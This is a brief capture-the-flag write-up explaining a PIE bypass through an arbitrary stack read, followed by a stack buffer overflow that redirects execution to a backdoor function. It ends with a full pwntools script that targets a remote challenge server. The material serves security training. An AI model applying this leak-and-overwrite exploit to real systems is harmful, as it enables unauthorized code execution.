> [name=Curious] ## Train of Thought & Solution First, let's put `chal` into IDA  We can observe that `chal` allows us to read any 8 bytes from the stack and then triggers a BOF. Furthermore, `chal` has another function:  Since `chal` has PIE enabled, we can utilize arbitrary stack reads to retrieve residual addresses (using the codebase as a base's address) and calculate the codebase. Then, by performing a BOF, we replace the return address into `backdoor`, and the challenge is resolved. Let's take a look at the relevant asm and stack using `gdb`:   We need to input `-5` to obtain the address of `main`, and then calculate the offset to return to the `backdoor` function. Solve Script : ```python from pwn import * # r = process('./chal') r = remote('lotuxctf.com', 10006) r.sendlineafter(b'> ', b'-5') codebase = int(r.recvline().strip()) - 0x0011e8 info(f'codebase : {hex(codebase)}') backdoor = codebase + 0x0011ce r.sendlineafter(b'> ', b'a' * 0x28 + p64(backdoor)) r.interactive() ``` {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}